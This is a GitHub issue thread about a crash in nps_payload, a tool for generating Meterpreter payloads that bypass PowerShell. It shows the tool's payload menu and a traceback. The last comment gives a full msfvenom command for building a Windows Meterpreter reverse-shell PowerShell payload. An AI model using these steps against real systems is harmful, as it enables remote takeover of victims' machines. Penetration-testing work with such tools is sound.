### ISSUE TITLE
IOError: [Errno 2] No such file or directory: 'msf_payload.ps1'

### ISSUE THREAD

**Issue by RizwanNawaz01** [trustedsec/nps_payload#3]
python nps_payload.py

                                     (            (
                              ) (    )\        )  )\ )
  (    `  )  (       `  )  ( /( )\ )((_)(   ( /( (()/(
  )\ ) /(/(  )\      /(/(  )(_)|()/( _  )\  )(_)) ((_)
 _(_/(((_)_\((_)    ((_)_\((_)_ )(_)) |((_)((_)_  _| |
| ' \)) '_ \|_-<    | '_ \) _` | || | / _ \/ _` / _` |
|_||_|| .__//__/____| .__/\__,_|\_, |_\___/\__,_\__,_|
      |_|     |_____|_|         |__/

                       v1.03

	(1)	Generate msbuild/nps/msf payload
	(2)	Generate msbuild/nps/msf HTA payload
	(99)	Quit

Select a task: 1

Payload Selection:

	(1)	windows/meterpreter/reverse_tcp
	(2)	windows/meterpreter/reverse_http
	(3)	windows/meterpreter/reverse_https
	(4)	Custom PS1 Payload

Select payload: 3
Enter Your Local IP Address (None): 192.168.137.145 
Enter the listener port (443): 8080
[*] Generating PSH Payload...
[*] Generating MSF Resource Script...
Traceback (most recent call last):
  File "nps_payload.py", line 417, in <module>
    main()
  File "nps_payload.py", line 410, in main
    options[task]()
  File "nps_payload.py", line 108, in generate_msbuild_nps_msf_payload
    encode_pshpayload("msf_payload.ps1")
  File "nps_payload.py", line 68, in encode_pshpayload
    psh_file = open(payload_file, "r")
IOError: [Errno 2] No such file or directory: 'msf_payload.ps1'

**Comment by cymilad** [comment]
yes my problem !!!!!!

**Comment by cymilad** [comment]
for me problem

**Comment by Spoonman1091** [comment]
From the error, it looks like the msf_payload.ps1 is not getting created. Can you run 'msfvenom' from the console? This is required to generate the payload.

**Comment by cymilad** [comment]
no

**Comment by Spoonman1091** [comment]
Install Metasploit. Make sure msfvenom is in your path definition.

**Comment by cymilad** [comment]
metasploit installed on kali linux

**Comment by sakuraupupup** [comment]
Before running this program you can use msfvenom to produce msf_payload.ps1 
The command is   msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx (your ip）LPORT=443 -f ps1 > msf_payload.ps1
